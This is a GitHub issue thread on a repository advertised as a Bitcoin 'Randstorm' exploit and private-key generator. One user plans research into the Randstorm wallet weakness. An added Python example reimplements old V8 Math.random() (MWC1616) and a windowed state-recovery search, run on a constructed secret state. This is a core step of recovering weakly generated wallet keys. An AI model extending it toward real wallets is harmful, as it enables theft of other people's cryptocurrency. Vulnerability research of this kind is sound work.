RandstormBTC / randstorm

Bitcoin Randstorm Exploit - Very Fast Private Key and Address Generator

Discussion about the vulnerability (more detailed) #11

Closed. randomchoice2 closed this 8 months ago

randomchoice2 commented 8 months ago

Hi, I have also started researching the Randstorm vulnerability. As we can read from Unciphered, they said that they were able to make it feasible using the wallet's GUID or IV ([link](https://www.unciphered.com/blog/randstorm-you-cant-patch-a-house-of-cards#:~:text=Typically%2C%20in%20order%20for%20this%20attack%20to%20be%20feasible%2C%20an%20attacker%20would%20need%20something%20which%20was%20generated%20from%20Math.random()%20at%20the%20time%20of%20wallet%20generation%20%2D%20this%20would%20typically%20be%20the%20wallet%20GUID%20or%20IV.%20This%20reduces%20the%20amount%20of%20necessary%20work%20anywhere%20from%2032%20to%2064%2Dbits.))

I also want to do that research with you; can we collaborate on it? I'm very interested in it too.

randomchoice2 commented 8 months ago

I see we have to implement this and do much deeper research. Here are the potential issues:

  1. Replicate old Math.random() itself (mwc1616)
  2. Somehow using blockchain data to recover valuable info (I'm still lacking on that; I mean Unciphered mentioned a GUID or IV kind of thing that I still don't understand)
  3. Optimisation

Also, I found some old website copies from various sources that used that library in different ways, some more secure and some much weaker. One of them just uses Math.random() itself. Will write on that later.
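For item 1 of the list above, here is an added example (not code from this repository or from Unciphered) of the MWC1616 generator that V8 used for `Math.random()` before late 2015, together with a windowed state search that illustrates what "reducing the work" means once part of the state is constrained. The two multipliers (18273 and 36969) and the output combination follow the old `V8::Random()`; the `next_double` mapping to [0, 1) and the 256-wide search windows are assumptions of this example, and the way V8 seeded the two state words is not reproduced at all.

```python
"""MWC1616 (two 16-bit multiply-with-carry streams) as used by old V8 Math.random(),
plus a two-phase windowed state search.

Added example, not the project's code.  Constants and output mixing follow the old
V8::Random(); seeding and the exact bits-to-double conversion are NOT reproduced
(the /2**32 mapping below is an assumption of this example).
"""

MASK32 = 0xFFFFFFFF


class MWC1616:
    def __init__(self, s0: int, s1: int) -> None:
        # Each word is an independent MWC stream.  A zero word would stay zero
        # forever, so callers must seed with non-zero 32-bit values.
        self.s0 = s0 & MASK32
        self.s1 = s1 & MASK32

    def next_u32(self) -> int:
        # Both updates fit in 32 bits: 18273 * 0xFFFF + 0xFFFF and
        # 36969 * 0xFFFF + 0xFFFF are each below 2**32.
        self.s0 = (18273 * (self.s0 & 0xFFFF) + (self.s0 >> 16)) & MASK32
        self.s1 = (36969 * (self.s1 & 0xFFFF) + (self.s1 >> 16)) & MASK32
        # The output sum can overflow, so it is reduced mod 2**32 like V8's uint32.
        return ((self.s0 << 14) + (self.s1 & 0x3FFFF)) & MASK32

    def next_double(self) -> float:
        # ASSUMED mapping: 32 random bits scaled into [0, 1).
        return self.next_u32() / 2**32


def recover_state(outputs, s0_range, s1_range):
    """Windowed search for (s0, s1) given consecutive raw outputs.

    The low 14 bits of every output equal (s1 & 0x3FFF) after that step, because
    (s0 << 14) contributes nothing below bit 14.  So s1 can be searched on its
    own first, and s0 only for the surviving s1 candidates: the cost is
    len(s1_range) + hits * len(s0_range) instead of the product.
    """
    s1_hits = []
    for s1 in s1_range:
        g = MWC1616(1, s1)  # s0 does not influence the low 14 bits
        if all((g.next_u32() & 0x3FFF) == (o & 0x3FFF) for o in outputs):
            s1_hits.append(s1)
    found = []
    for s1 in s1_hits:
        for s0 in s0_range:
            g = MWC1616(s0, s1)
            if all(g.next_u32() == o for o in outputs):
                found.append((s0, s1))
    return found


def demo():
    # Constructed sample: a secret state, six observed outputs, and search
    # windows of 256 values around each word (standing in for the narrowing an
    # attacker gets from a known GUID/IV; real windows are far larger).
    secret_s0, secret_s1 = 0x12345678, 0x9ABCDEF0
    gen = MWC1616(secret_s0, secret_s1)
    observed = [gen.next_u32() for _ in range(6)]
    s0_window = range(secret_s0 - 100, secret_s0 + 156)
    s1_window = range(secret_s1 - 100, secret_s1 + 156)
    return recover_state(observed, s0_window, s1_window)


if __name__ == "__main__":
    print(demo())
```

The phase split only exploits the structure of the output combination; it does not by itself shrink the 64-bit state space, which is why the blog post cited above talks about needing a second `Math.random()`-derived value from the same session.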

randomchoice2 commented 8 months ago

Closing the issue: moving to the discussions page.